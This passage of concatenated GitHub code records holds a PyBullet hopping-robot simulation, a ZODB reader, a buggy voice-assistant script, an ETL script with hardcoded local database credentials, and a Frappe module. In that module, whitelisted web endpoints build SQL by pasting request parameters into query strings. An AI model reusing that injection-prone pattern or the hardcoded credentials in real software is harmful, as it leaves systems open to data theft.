rgbaColor=[0,0,0,1])\n\nblock=p.createMultiBody(baseMass=0,baseCollisionShapeIndex = sh_colBox,\n basePosition = [-2,0,-0.1],baseOrientation=[0.0,0.1,0.0,1])\nsth=0.15\nblock2=p.createMultiBody(baseMass=0,baseCollisionShapeIndex = sh_colBox, baseVisualShapeIndex = sh_visBox,\n basePosition = [5.75,0.15,-0.2+1*sth],baseOrientation=[0.0,0.0,0.0,1])\nblock3=p.createMultiBody(baseMass=0,baseCollisionShapeIndex = sh_colBox,\n basePosition = [5.75+0.33,0,-0.2+2*sth],baseOrientation=[0.0,0.0,0.0,1])\nblock4=p.createMultiBody(baseMass=0,baseCollisionShapeIndex = sh_colBox,\n basePosition = [5.75+0.66,0.2,-0.2+3*sth],baseOrientation=[0.1,0.0,0.0,1])\nblock5=p.createMultiBody(baseMass=0,baseCollisionShapeIndex = sh_colBox,\n basePosition = [5.75+0.99,0.1,-0.2+4*sth],baseOrientation=[0.0,-0.1,0.0,1])\n\nbox11l=0.5\nbox11w=0.5\nbox11h=0.1\nsh_box11 = p.createCollisionShape(p.GEOM_BOX,halfExtents=[box11l,box11w,box11h])\nsth=0.15\nfor k in range(10):\n p.createMultiBody(baseMass=0,baseCollisionShapeIndex = sh_box11,\n basePosition = [3+0.4*k,-1+k/200,k*sth],baseOrientation=[0.0,0.0,0.0,1])\np.createMultiBody(baseMass=0,baseCollisionShapeIndex = sh_box11,\n basePosition = [3+0.4*10,-1,k*sth+0.01],baseOrientation=[0.0,0.0,0.0,1])\nfor k in range(10):\n p.createMultiBody(baseMass=0,baseCollisionShapeIndex = sh_box11,\n basePosition = [3+0.4*10+k/200,-0.5+0.4*k,(k+10)*sth],baseOrientation=[0.0,0.0,0.0,1])\nbox14_1l=7\nbox14_1w=0.75\nbox11h=0.1\nsh_box14_1 = p.createCollisionShape(p.GEOM_BOX,halfExtents=[box14_1l,box14_1w,box11h])\nbox14_1=p.createMultiBody(baseMass=0,baseCollisionShapeIndex = sh_box14_1,\n basePosition = [-0.3,3.1,1.4],baseOrientation=[0.0,-0.1,0.0,1])\n\n\n\np.setGravity(0,0,-10)\np.setRealTimeSimulation(1)\n#make to plane less slippery\np.changeDynamics(plId,-1,lateralFriction=10)\np.changeDynamics(block5,-1,lateralFriction=10)\np.changeDynamics(box14_1,-1,lateralFriction=10)\n\n#connections:\ncid_0= p.createConstraint(bodyId, -1 ,footId, -1 , p.JOINT_FIXED, jointAxis=[0,0,0],parentFramePosition=[0,0,0], childFramePosition=[0,0,1])\ncid4 = p.createConstraint(bodyId,-1,cubeId3,-1,p.JOINT_FIXED,[0,0,0],[0,0,0],[0.25,0,0])\ncid5 = p.createConstraint(bodyId,-1,cubeId4,-1,p.JOINT_FIXED,[0,0,0],[0,0,0],[-0.25,0,0])\ncid6 = p.createConstraint(bodyId,-1,cubeId5,-1,p.JOINT_FIXED,[0,0,0],[0,0,0],[0,0.25,0])\ncid7 = p.createConstraint(bodyId,-1,cubeId5,-1,p.JOINT_FIXED,[0,0,0],[0,0,0],[0,-0.25,0])\n\n\n# #simple simulation to start:\n# p.setTimeStep(0.001)\n# p.setRealTimeSimulation(1)\n\n\n#initiate:\npivot=[0,0,0,1]\ndecomprPhase=0\n\nJoints=p.getNumJoints(bodyId)\nCubePos, cubeOrn = p.getBasePositionAndOrientation(bodyId)\nDes= cubeOrn\nEuler=p.getEulerFromQuaternion(cubeOrn)\n\nt=0\ntstr=0\nvx=0\nvy=0\nzgnd=0\njmp=0\nxgl=7\nygl=-1\n\n\ndestination=[]\nx_vel=[]\ny_vel=[]\nz_vel=[]\nz_pos=[]\nx_pos=[]\ny_pos=[]\n\n1\n# while 1:\nfor i in range(1000):\n p.resetDebugVisualizerCamera( cameraDistance=6, cameraYaw=-130+t/10, cameraPitch=-60, \n cameraTargetPosition=[cubePos[0], cubePos[1], 0.25])\n t+=1 \n time.sleep(0.01)\n\n keys = p.getKeyboardEvents()\n if keys.get(65297): #Up\n vx+=0.002\n if keys.get(65298): #Down\n vx-=0.002\n if keys.get(65296): #Right\n vy-=0.002\n if keys.get(65295): #Left\n vy+=0.002\n if keys.get(97): #A\n if jmp==0: \n vx*=3\n vy*=3\n jmp=1\n \n if cubePos[0]3:\n xgl=-8\n if xgl==-8 and cubePos[0]<6.5:\n vy=-0.04\n \n #computing positions velocities, orientation angles, etc\n cube_prev=cubePos\n Euler_prev=Euler\n cubePos, cubeOrn = p.getBasePositionAndOrientation(bodyId)\n vel_x_cube_pos=(cubePos[0]-cube_prev[0])/0.01\n vel_y_cube_pos=(cubePos[1]-cube_prev[1])/0.01\n vel_z_cube_pos=(cubePos[2]-cube_prev[2])/0.01\n x_vel.append(vel_x_cube_pos)\n y_vel.append(vel_y_cube_pos)\n z_vel.append(vel_z_cube_pos)\n z_pos.append(cubePos[2])\n x_pos.append(cubePos[0])\n y_pos.append(cubePos[1])\n\n Euler=p.getEulerFromQuaternion(cubeOrn)\n omega_x=(Euler[0]-Euler_prev[0])/0.01\n omega_y=(Euler[1]-Euler_prev[1])/0.01\n\n x_foot, dum=p.getBasePositionAndOrientation(footId)\n if (vel_z_cube_pos>0 and decomprPhase==0):\n decomprPhase=1\n tstr=t \n zgnd=x_foot[2]+0.05\n\n if (x_foot[2]-zgnd>0.105 and decomprPhase==1):\n decomprPhase=2\n if jmp==1:\n vx=vx/3\n vy=vy/3\n jmp=0\n \n if x_foot[2]-zgnd<0.105 and decomprPhase==2:\n decomprPhase=0\n\n if decomprPhase==1:\n #decompressing: PD control on orientation of body during stance\n DesEU=p.getEulerFromQuaternion(Des)\n Des = p.getQuaternionFromEuler(DesEU + np.array([-0.07*omega_x-0.3*Euler[0] -0.15*(-(vel_y_cube_pos-vy)*np.cos(Euler[2])+(vel_x_cube_pos-vx)*np.sin(Euler[2])),\n -0.07*omega_y-0.3*Euler[1] -0.15*( (vel_x_cube_pos-vx)*np.cos(Euler[2])+(vel_y_cube_pos-vy)*np.sin(Euler[2])),0.0]))\n if ((t-tstr)<8 and jmp==1): #trust for a small time interval (increased spring force)\n p.changeConstraint(cid_0,pivot,jointChildFrameOrientation=Des, maxForce=1300)\n elif ((t-tstr)<8):\n p.changeConstraint(cid_0,pivot,jointChildFrameOrientation=Des, maxForce=600)\n else:\n p.changeConstraint(cid_0,pivot,jointChildFrameOrientation=Des, maxForce=300)\n else:\n #flight and compression: Reposition foot for next landing based on body horizontal velocity and orientation\n if (x_foot[2]-zgnd>0.105):\n Des = p.getQuaternionFromEuler(\n [+0.15*(-(vel_y_cube_pos-0.0)*np.cos(Euler[2])+(vel_x_cube_pos-0.0)*np.sin(Euler[2])) + Euler[0],\n +0.15*( (vel_x_cube_pos-0.0)*np.cos(Euler[2])+(vel_y_cube_pos-0.0)*np.sin(Euler[2])) + Euler[1], 0.0])\n \n p.changeConstraint(cid_0,pivot,jointChildFrameOrientation=Des, maxForce=300)\n destination.append(Des)\n\np.disconnect()\n\n\nxrot=[]\nyrot=[]\nzrot=[]\nfor i in range(len(destination)):\n print(p.getEulerFromQuaternion(destination[i]))\n xrot.append(destination[i][0])\n yrot.append(destination[i][1])\n zrot.append(destination[i][2])\n\nfig,axs=plt.subplots(7)\naxs[0].plot(xrot)\naxs[1].plot(yrot)\naxs[2].plot(zrot)\naxs[3].plot(x_vel)\naxs[4].plot(y_vel)\naxs[5].plot(z_vel)\naxs[6].plot(z_pos)\n\naxs[0].set_title(\"X rot Euler\")\naxs[1].set_title(\"y rot Euler\")\naxs[2].set_title(\"z rot Euler\")\naxs[3].set_title(\"X vel\")\naxs[4].set_title(\"y vel\")\naxs[5].set_title(\"z vel\")\naxs[6].set_title(\"z pos\")\n\n\n# plt.plot(destination)\nplt.show()\n\n","repo_name":"anushtup-nandy/Hopper_robot","sub_path":"Jumping_robot_sim.py","file_name":"Jumping_robot_sim.py","file_ext":"py","file_size_in_byte":11230,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"9771950446","text":"from ZODB import FileStorage,DB\nimport transaction\nfrom modelo import Compania\nstorage = FileStorage.FileStorage('zodb/meubd.fs')\nbanco=DB(storage)\nconnection=banco.open()\nroot=connection.root()\n\n# percorrer as pessoas\nfor pe in root['empresas']:\n print(pe)\n\nconnection.close()","repo_name":"NaTTaNMendes/POO2","sub_path":"E9/OLHARDADOSZODB.PY","file_name":"OLHARDADOSZODB.PY","file_ext":"py","file_size_in_byte":280,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"25805445277","text":"from pip import main\r\nimport pyttsx3\r\nimport datetime\r\nimport speech_recognition as sr\r\nimport wikipedia\r\nimport webbrowser\r\nimport os\r\n\r\n\r\nengine=pyttsx3.init('sapi5')\r\nvoices=engine.getProperty('voices')\r\n# print(voices[1].id)\r\nengine.setProperty('voice',voices[1].id)\r\n\r\n\r\n#SPEAK FUNCTION\r\n# ---------------------------------------------------------------------------------------------------------\r\ndef speak(audio):\r\n engine.say(audio)\r\n engine.runAndWait()\r\n\r\n#WISH ME FUNCTION\r\n# ----------------------------------------------------------------------------------------------------------\r\ndef wishMe():\r\n hour = int(datetime.datetime.now().hour)\r\n if hour>=0 and hour<12:\r\n speak(\"Good Morning!\")\r\n\r\n elif hour>=12 and hour<18:\r\n speak(\"Good Afternoon!\") \r\n\r\n else:\r\n speak(\"Good Evening!\") \r\n\r\n speak(\"I am Jarvis Sir. Please tell me how may I help you\") \r\n\r\n\r\n#TAKE COMMAND FUNCTION\r\n# ------------------------------------------------------------------------------------------------------\r\ndef takecommand():\r\n #takes microphone input from user and return string output\r\n r = sr.Recognizer()\r\n with sr.Microphone() as source:\r\n print(\"Listening...\")\r\n r.pause_threshold = 1 \r\n #seconds of non speaking audio before a phrase is considered complete\r\n audio = r.listen(source)\r\n try:\r\n print(\"Recognizing...\") \r\n query = r.recognize_google(audio, language='en-in')\r\n print(f\"User said: {query}\\n\")\r\n\r\n except Exception as e:\r\n # print(e) \r\n print(\"Say that again please...\") \r\n return \"None\"\r\n return query \r\n\r\n\r\n #email function\r\n #----------------------------------------------------------------------------------------------------------\r\n def sendEmail(to, content):\r\n server = smtplib.SMTP('smtp.gmail.com', 587)\r\n server.ehlo()\r\n server.starttls()\r\n server.login('youremail@gmail.com', 'your-password')\r\n server.sendmail('youremail@gmail.com', to, content)\r\n server.close()\r\n\r\n\r\n#MAIN FUNCTION\r\n#--------------------------------------------------------------------------------------------------------------\r\n\r\nif __name__== \"__main__\":\r\n # speak(\"shalini is good girl\")\r\n wishMe()\r\n\r\n while(True):\r\n query=takecommand().lower()\r\n #Logic for executing tasks based on query\r\n\r\n#--------------------------------------------------------------------------------------------------------------\r\n if 'wikipedia' in query:\r\n speak('Searching Wikipedia...')\r\n query = query.replace(\"wikipedia\", \"\")\r\n results = wikipedia.summary(query, sentences=5)\r\n #jarvis read 5 sentences \r\n speak(\"According to Wikipedia....................\")\r\n print(results)\r\n speak(results)\r\n\r\n elif 'open youtube' in query:\r\n webbrowser.open(\"youtube.com\")\r\n\r\n elif 'open google' in query:\r\n webbrowser.open(\"google.com\")\r\n\r\n elif 'open stackoverflow' in query:\r\n webbrowser.open(\"stackoverflow.com\") \r\n \r\n elif 'open HackerRank' in query:\r\n webbrowser.open(\"hackerrank.com\") \r\n \r\n elif 'play music' in query:\r\n music_dir = 'G:\\\\Favouritesongs'\r\n #path of music folder\r\n songs = os.listdir(music_dir)\r\n # print(songs) \r\n os.startfile(os.path.join(music_dir, songs[0]))\r\n #it will play 1st song of your playlist if u want to play random then we have to use random module\r\n\r\n elif 'the time' in query:\r\n strTime = datetime.datetime.now().strftime(\"%H:%M:%S\") \r\n speak(f\"Sir, the time is {strTime}\")\r\n\r\n \r\n elif 'open code' in query:\r\n codePath = \"C:\\\\Users\\\\HP\\\\AppData\\\\Local\\\\Programs\\\\Microsoft VS Code\\\\Code.exe\"\r\n os.startfile(codePath)\r\n #opening the file\r\n\r\n elif 'email to harry' in query:\r\n try:\r\n speak(\"What should I say?\")\r\n content = takeCommand()\r\n to = \"harryyourEmail@gmail.com\" \r\n sendEmail(to, content)\r\n speak(\"Email has been sent!\")\r\n except Exception as e:\r\n print(e)\r\n speak(\"Sorry my friend harry bhai. I am not able to send this email\") \r\n #this email only work when we change our security to less secure app \r\n\r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n\r\n\r\n\r\n \r\n \r\n\r\n","repo_name":"shalini0517/Jarvis-AI-desktop","sub_path":"jarvis.py","file_name":"jarvis.py","file_ext":"py","file_size_in_byte":4560,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"10048269935","text":"\"\"\" \n:author: Tal Peretz\n:date: 11/11/2016\n:TL;DR: this module purpose is generating datasets for pyds tests\n\"\"\"\n\nimport os\n\nimport pandas as pd\nimport sklearn.datasets\n\nsave_attribute_to_file_extension = {'to_excel': 'xls', 'to_html': 'html', 'to_json': 'json', 'to_pickle': 'pickle',\n 'to_stata': 'stata', 'to_sql': 'sql', 'to_csv': 'csv', }\nDATASETS_PATH = os.path.abspath(\"\")\n\ndatasets = (\n sklearn.datasets.load_boston(),\n sklearn.datasets.fetch_california_housing())\n\n\ndef save_datasets(datasets_collection):\n for i, dataset in enumerate(datasets_collection):\n dataset_name = dataset['DESCR'].split('\\n')[0]\n # build path variable, check if exists, if not create it\n path = DATASETS_PATH + '/' + dataset_name + '/'\n file_name = 'train.%s' % tuple(save_attribute_to_file_extension.values())[i]\n if not os.path.exists(path):\n os.makedirs(path)\n\n # build the dataframe in the form of data columns and target variable in one DataFrame\n df = pd.concat([pd.DataFrame(data=dataset['data'], columns=dataset['feature_names']),\n pd.Series(data=dataset['target'], name='target')], axis=1)\n\n # save the resulting DataFrame in a format from save_attribute_to_file_extension\n getattr(df, tuple(save_attribute_to_file_extension.keys())[i])(path + file_name)\n\n\nif __name__ == '__main__':\n save_datasets(datasets)\n","repo_name":"talperetz/pyds","sub_path":"tests/resources/datasets/save_datasets.py","file_name":"save_datasets.py","file_ext":"py","file_size_in_byte":1467,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"38"} +{"seq_id":"10449781960","text":"import re\n\nimport pandas as pd\nfrom sqlalchemy import create_engine\n\n\ndef remove_special_chars(x):\n return re.sub(r\"[^a-zA-Z0-9]+\", ' ', x)\n\n\ndef transform_str(value):\n if type(value) is not str:\n return None\n new = remove_special_chars(value)\n return new.upper()\n\n\ndef ingest_dim_local(source_engine, dw_engine):\n source_connection = source_engine.connect()\n table_name = \"dim_local\"\n\n results = source_connection.execute(\"\"\"\n (SELECT\n customer_zip_code_prefix as zip_code_prefix,\n customer_city as city,\n customer_state as state\n FROM customer)\n UNION\n (SELECT\n seller_zip_code_prefix as zip_code_prefix,\n seller_city as city,\n seller_state as state\n FROM seller);\n\n \"\"\")\n data = pd.DataFrame(results.fetchall())\n data.columns = results.keys()\n\n data.drop_duplicates(subset=['zip_code_prefix'], keep='first', inplace=True)\n data[\"city\"] = data[\"city\"].map(transform_str)\n data[\"state\"] = data[\"state\"].map(transform_str)\n\n data.to_sql(name=table_name, con=dw_engine, if_exists='append', index=False)\n\n\ndef ingest_dim_product(source_engine, dw_engine):\n source_connection = source_engine.connect()\n table_name = \"dim_product\"\n\n results = source_connection.execute(\"\"\"\n SELECT\n product.product_id as original_id,\n product.product_category_name as category_name\n FROM product;\n \"\"\")\n data = pd.DataFrame(results.fetchall())\n data.columns = results.keys()\n\n data[\"category_name\"] = data[\"category_name\"].map(transform_str)\n\n data.to_sql(name=table_name, con=dw_engine, if_exists='append', index=False)\n\n\ndef ingest_dim_order_payment_and_dim_payment(source_engine, dw_engine):\n source_connection = source_engine.connect()\n\n results = source_connection.execute(\"\"\"\n SELECT\n order_id as order_id,\n payment_sequential as sequential,\n payment_type as type,\n payment_installments as installments,\n payment_value as value\n FROM order_payment;\n \"\"\")\n data = pd.DataFrame(results.fetchall())\n data.columns = results.keys()\n\n order_payment = data[['order_id']].copy()\n order_payment.drop_duplicates(subset=['order_id'], keep='first', inplace=True)\n order_payment.to_sql(name=\"dim_order_payment\", con=dw_engine, if_exists='append', index=False)\n order_payment = pd.read_sql_table(\"dim_order_payment\", con=dw_engine)\n\n data = pd.merge(data, order_payment, on='order_id')\n data.rename({'id': 'order_payment_id'}, axis=1, inplace=True)\n payment = data[['order_payment_id', 'sequential', 'type', 'installments', 'value']].copy()\n payment.to_sql(name=\"dim_payment\", con=dw_engine, if_exists='append', index=False)\n\n\ndef ingest_dim_seller(source_engine, dw_engine):\n source_connection = source_engine.connect()\n table_name = \"dim_seller\"\n\n results = source_connection.execute(\"\"\"\n SELECT \n seller_id as original_id,\n seller_zip_code_prefix as zip_code_prefix\n FROM seller;\n \"\"\")\n seller = pd.DataFrame(results.fetchall())\n seller.columns = results.keys()\n\n dim_local = pd.read_sql_table(\"dim_local\", con=dw_engine)\n\n data = pd.merge(seller, dim_local, on='zip_code_prefix')\n data.rename({'id': 'local_id'}, axis=1, inplace=True)\n dim_seller = data[['original_id', 'local_id']].copy()\n dim_seller.to_sql(name=table_name, con=dw_engine, if_exists='append', index=False)\n\n\ndef ingest_dim_customer(source_engine, dw_engine):\n source_connection = source_engine.connect()\n table_name = \"dim_customer\"\n\n results = source_connection.execute(\"\"\"\n SELECT \n customer_id as original_id,\n customer_unique_id as unique_id,\n customer_zip_code_prefix as zip_code_prefix\n FROM customer;\n \"\"\")\n customer = pd.DataFrame(results.fetchall())\n customer.columns = results.keys()\n\n dim_local = pd.read_sql_table(\"dim_local\", con=dw_engine)\n\n data = pd.merge(customer, dim_local, on='zip_code_prefix')\n data.rename({'id': 'local_id'}, axis=1, inplace=True)\n dim_seller = data[['original_id', 'local_id', 'unique_id']].copy()\n dim_seller.to_sql(name=table_name, con=dw_engine, if_exists='append', index=False)\n\n\ndef ingest_dim_date(source_engine, dw_engine):\n source_connection = source_engine.connect()\n table_name = \"dim_date\"\n\n results = source_connection.execute(\"\"\"\n (SELECT \n DAY(order_purchase_timestamp) as day,\n MONTH(order_purchase_timestamp) as month,\n YEAR(order_purchase_timestamp) as year,\n DATE_FORMAT(order_purchase_timestamp, \"%%Y/%%m/%%d\") as str\n FROM orders WHERE order_purchase_timestamp IS NOT NULL)\n UNION\n (SELECT \n DAY(order_approved_at) as day,\n MONTH(order_approved_at) as month,\n YEAR(order_approved_at) as year,\n DATE_FORMAT(order_approved_at, \"%%Y/%%m/%%d\") as str\n FROM orders WHERE order_approved_at IS NOT NULL)\n UNION\n (SELECT \n DAY(order_delivered_carrier_date) as day,\n MONTH(order_delivered_carrier_date) as month,\n YEAR(order_delivered_carrier_date) as year,\n DATE_FORMAT(order_delivered_carrier_date, \"%%Y/%%m/%%d\") as str\n FROM orders WHERE order_delivered_carrier_date IS NOT NULL)\n UNION\n (SELECT \n DAY(order_delivered_customer_date) as day,\n MONTH(order_delivered_customer_date) as month,\n YEAR(order_delivered_customer_date) as year,\n DATE_FORMAT(order_delivered_customer_date, \"%%Y/%%m/%%d\") as str\n FROM orders WHERE order_delivered_customer_date IS NOT NULL)\n UNION\n (SELECT \n DAY(order_estimated_delivery_date) as day,\n MONTH(order_estimated_delivery_date) as month,\n YEAR(order_estimated_delivery_date) as year,\n DATE_FORMAT(order_estimated_delivery_date, \"%%Y/%%m/%%d\") as str\n FROM orders WHERE order_estimated_delivery_date IS NOT NULL);\n \"\"\")\n data = pd.DataFrame(results.fetchall())\n data.columns = results.keys()\n\n data.drop_duplicates(subset=['str'], keep='first', inplace=True)\n data.to_sql(name=table_name, con=dw_engine, if_exists='append', index=False)\n\n\ndef ingest_dims():\n source_engine = create_engine(\"mysql+pymysql://root:12345@localhost:3307/sourceDB\", echo=False)\n dw_engine = create_engine(\"mysql+pymysql://root:12345@localhost:3307/dw\", echo=False)\n\n ingest_dim_date(source_engine, dw_engine)\n ingest_dim_local(source_engine, dw_engine)\n ingest_dim_product(source_engine, dw_engine)\n ingest_dim_order_payment_and_dim_payment(source_engine, dw_engine)\n ingest_dim_seller(source_engine, dw_engine)\n ingest_dim_customer(source_engine, dw_engine)\n\n\ndef ingest_fact_order_item(source_engine, dw_engine):\n source_connection = source_engine.connect()\n table_name = \"fact_order_item\"\n\n results = source_connection.execute(\"\"\"\n SELECT \n order_item.order_item_id as original_id,\n orders.order_id as order_id,\n orders.customer_id as customer_original_id,\n orders.order_status as status,\n \n DATE_FORMAT(orders.order_purchase_timestamp, \"%%Y/%%m/%%d\") as purchase_timestamp_str,\n DATE_FORMAT(orders.order_approved_at, \"%%Y/%%m/%%d\") as approved_at_str,\n DATE_FORMAT(orders.order_delivered_carrier_date, \"%%Y/%%m/%%d\") as delivered_carrier_date_str,\n DATE_FORMAT(orders.order_delivered_customer_date, \"%%Y/%%m/%%d\") as delivered_customer_date_str,\n DATE_FORMAT(orders.order_estimated_delivery_date, \"%%Y/%%m/%%d\") as estimated_delivery_date_str,\n \n order_item.price as price,\n order_item.product_id as product_original_id,\n order_item.seller_id as seller_original_id\n FROM orders\n INNER JOIN order_item on order_item.order_id = orders.order_id;\n \"\"\")\n data = pd.DataFrame(results.fetchall())\n data.columns = results.keys()\n\n dim_date = pd.read_sql_table(\"dim_date\", con=dw_engine)\n dim_customer = pd.read_sql_table(\"dim_customer\", con=dw_engine)\n dim_product = pd.read_sql_table(\"dim_product\", con=dw_engine)\n dim_seller = pd.read_sql_table(\"dim_seller\", con=dw_engine)\n dim_order_payment = pd.read_sql_table(\"dim_order_payment\", con=dw_engine)\n\n data = pd.merge(data, dim_customer, left_on=['customer_original_id'], right_on=['original_id'])\n data.rename({'id': 'customer_id'}, axis=1, inplace=True)\n\n data = pd.merge(data, dim_product, left_on=['product_original_id'], right_on=['original_id'])\n data.rename({'id': 'product_id'}, axis=1, inplace=True)\n\n data = pd.merge(data, dim_seller, left_on=['seller_original_id'], right_on=['original_id'])\n data.rename({'id': 'seller_id'}, axis=1, inplace=True)\n\n data = pd.merge(data, dim_date, how='left', left_on=['purchase_timestamp_str'], right_on=['str'])\n data.rename({'id': 'purchase_timestamp_date_id'}, axis=1, inplace=True)\n\n data = pd.merge(data, dim_date, how='left', left_on=['approved_at_str'], right_on=['str']) #\n data.rename({'id': 'approved_at_date_id'}, axis=1, inplace=True)\n\n data = pd.merge(data, dim_date, how='left', left_on=['delivered_carrier_date_str'], right_on=['str']) #\n data.rename({'id': 'delivered_carrier_date_id'}, axis=1, inplace=True)\n\n data = pd.merge(data, dim_date, how='left', left_on=['delivered_customer_date_str'], right_on=['str']) #\n data.rename({'id': 'delivered_customer_date_id'}, axis=1, inplace=True)\n\n data = pd.merge(data, dim_date, how='left', left_on=['estimated_delivery_date_str'], right_on=['str'])\n data.rename({'id': 'estimated_delivery_date_id'}, axis=1, inplace=True)\n\n data = pd.merge(data, dim_order_payment, how='left', on='order_id') #\n data.rename({'id': 'order_payment_id'}, axis=1, inplace=True)\n\n data.rename({'original_id_x': 'original_id'}, axis=1, inplace=True)\n fact_order_item = data[\n ['order_id', 'product_id', 'seller_id', 'customer_id', 'original_id', 'order_payment_id', 'price', 'status',\n 'purchase_timestamp_date_id', 'approved_at_date_id', 'delivered_carrier_date_id', 'delivered_customer_date_id',\n 'estimated_delivery_date_id']].copy()\n fact_order_item.to_sql(name=table_name, con=dw_engine, if_exists='append', index=False)\n\n\ndef ingest_facts():\n source_engine = create_engine(\"mysql+pymysql://root:12345@localhost:3307/sourceDB\", echo=False)\n dw_engine = create_engine(\"mysql+pymysql://root:12345@localhost:3307/dw\", echo=False)\n\n ingest_fact_order_item(source_engine, dw_engine)\n\n\ndef delete_all():\n dw_engine = create_engine(\"mysql+pymysql://root:12345@localhost:3307/dw\", echo=False)\n dw_connection = dw_engine.connect()\n dw_connection.execute(\"DELETE FROM fact_order_item;\")\n dw_connection.execute(\"DELETE FROM dim_customer;\")\n dw_connection.execute(\"DELETE FROM dim_seller;\")\n dw_connection.execute(\"DELETE FROM dim_payment;\")\n dw_connection.execute(\"DELETE FROM dim_order_payment;\")\n dw_connection.execute(\"DELETE FROM dim_product;\")\n dw_connection.execute(\"DELETE FROM dim_local;\")\n dw_connection.execute(\"DELETE FROM dim_date;\")\n\n\nif __name__ == \"__main__\":\n delete_all()\n ingest_dims()\n ingest_facts()\n","repo_name":"CaioSGoncalves/ECommerceDW","sub_path":"1_dw_ingestion.py","file_name":"1_dw_ingestion.py","file_ext":"py","file_size_in_byte":11225,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"38"} +{"seq_id":"18618206368","text":"from __future__ import unicode_literals\nimport frappe\nfrom frappe import _\nimport frappe.defaults\nimport frappe.permissions\nfrom frappe.core.doctype.user.user import get_system_users\nfrom frappe.utils.csvutils import UnicodeWriter, read_csv_content_from_uploaded_file\nfrom frappe.defaults import clear_default\nimport datetime\n\ndef formated_date(date_str):\n\treturn datetime.datetime.strptime(date_str , '%d-%m-%Y').strftime('%Y-%m-%d')\n\t \n@frappe.whitelist()\ndef get_data(from_date=None,to_date=None,currency=None):\n\tfrappe.errprint(currency)\n\tdata_dict = {'cols':'name ,net_total', 'tab':'`tabSales Order`', 'cond_col': 'delivery_date','cncy':'currency'}\n\tmake_cond(data_dict, from_date, to_date,currency)\t\t\t\t\n\treturn{\n\t\t\"sales_order_total\": make_query(data_dict)\n\t}\n\t\n@frappe.whitelist()\ndef get_jv_data(from_date=None,to_date=None):\n\tdata_dict = {'cols':'name,total_credit', 'tab':'`tabJournal Voucher`', 'cond_col': 'posting_date','cncy':'currency'}\n\tmake_cond(data_dict, from_date, to_date)\t\t\t\t\n\treturn{\n\t\t\"order_total\": make_query(data_dict)\n\t}\n\t\n\ndef make_cond(data_dict, from_date=None,to_date=None,currency=None):\n\t\n\tif from_date and to_date and currency:\n\t\tfrappe.errprint(\"in the else\")\n\t\tdata_dict['cond'] = \"\"\" where %(cond_col)s between '%(from_date)s' and '%(to_date)s' and %(cncy)s = '%(currency)s'\n\t\t\t\"\"\"%{'cond_col': data_dict.get('cond_col'), 'from_date': formated_date(from_date),\n\t\t\t\t\t'to_date': formated_date(to_date),'currency':currency, 'cncy':data_dict.get('cncy')}\n\n\telif from_date and to_date:\n\t\tdata_dict['cond'] = \"\"\" where %(cond_col)s between '%(from_date)s' and '%(to_date)s' \n\t\t\t\"\"\"%{'cond_col': data_dict.get('cond_col'), 'from_date': formated_date(from_date),\n\t\t\t\t\t'to_date': formated_date(to_date)}\n\telse:\n\t\tdata_dict['cond'] = ' '\n\n\ndef make_query(data_dict):\n\tstmt=\"select %(cols)s from %(tab)s %(cond)s\"%data_dict\n\t\n\treturn frappe.db.sql(\"select %(cols)s from %(tab)s %(cond)s\"%data_dict,debug=1)\n\n@frappe.whitelist()\ndef get_activities():\n\tdbname=frappe.db.sql(\"\"\"select site_name from `tabSubAdmin Info` where active=1\"\"\",as_dict=1)\n\tlst=[]\n\tqry_srt='select subject,site_name from('\n\tfor key in dbname:\n\t\ttemp =key['site_name']\n\t\tqry=\"SELECT subject,creation,'%s' as site_name FROM \"%(temp)\n\t\tif temp :\n\t\t\tqry+=temp+'.tabFeed'\n\t\t\tlst.append(qry)\n\tfin_qry=' UNION '.join(lst)\n\tqry=qry_srt+fin_qry+\" where doc_name='Administrator')foo ORDER BY creation DESC limit 5\"\n\tact_details=frappe.db.sql(fin_qry,as_dict=1,debug=1)\n\treturn act_details\n\n\n@frappe.whitelist()\ndef get_data_newsale(from_date=None,to_date=None):\n\tif from_date and to_date:\n\t\tstr1=\"select date_format(creation,'%M') as month,count(*) as lead from `tabLead` where date(creation) between '\"+formated_date(from_date)+\"' and '\"+formated_date(to_date)+\"' order by month\"\n\t\tsales_details=frappe.db.sql(str1,debug=1)\n\t\treturn{\n\t\t\"order_total\": sales_details\n\t }\n\telse:\n\t\tstr1=\"select date_format(creation,'%M') as month,count(*) as lead from `tabLead` order by month\"\n\t\tsales_details=frappe.db.sql(str1,debug=1)\n\t\treturn{\n\t\t\"order_total\": sales_details\n\t }\n\n@frappe.whitelist()\ndef get_prospect(from_date=None,to_date=None):\n\tfrappe.errprint(\"in the pro py\")\n\tfrappe.errprint(from_date)\n\tfrappe.errprint(to_date)\n\n\tif from_date and to_date:\n\t\tstr2=\"select name,sum(target_amount*percentage_allocation/100)as target_amount from (SELECT sp.name,bd.fiscal_year,bdd.month,bdd.percentage_allocation,(select sum(td.target_amount) from `tabTarget Detail` td where td.parent=sp.name and td.fiscal_year=bd.fiscal_year) as target_amount,(case when bdd.month in('January','February','March') then SUBSTRING_INDEX(SUBSTRING_INDEX(bd.fiscal_year, '-', 1), ' ', -1) else SUBSTRING_INDEX(SUBSTRING_INDEX(bd.fiscal_year, '-', -1), ' ', -1) end) as year FROM `tabSales Person` sp,`tabBudget Distribution` bd,`tabBudget Distribution Detail` bdd where sp.distribution_id=bd.name and bdd.parent=bd.name )foo where date_format(str_to_date(concat('01-',month,'-',year),'%d-%M-%Y'),'%y-%m') between date_format(date('\"+formated_date(from_date)+\"'),'%y-%m') and date_format(date('\"+formated_date(to_date)+\"'),'%y-%m') group by name\"\n\t\tfrappe.errprint(str2)\n\t\tprospect_details=frappe.db.sql(str2,debug=1)\n\t\tfrappe.errprint(prospect_details)\n\t\treturn{\n\t\t\"order_total\": prospect_details\n\t }\n\telse:\n\t\tstr1=\"select date_format(creation,'%M') as month,count(*) as lead from `tabLead` order by month\"\n\t\tsales_details=frappe.db.sql(str1,debug=1)\n\t\treturn{\n\t\t\"order_total\": sales_details\n\t }\t \n\n\n@frappe.whitelist()\ndef get_subscription(from_date=None,to_date=None):\n\tfrappe.errprint(\"in the get_subscription 